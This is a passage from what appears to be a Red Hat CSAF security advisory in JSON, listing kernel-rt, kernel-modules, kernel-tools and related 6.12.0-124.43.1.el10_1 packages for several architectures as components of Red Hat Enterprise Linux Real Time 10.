"product_id": "RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-doc-0:6.12.0-124.43.1.el10_1.noarch as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch"
},
"product_reference": "kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
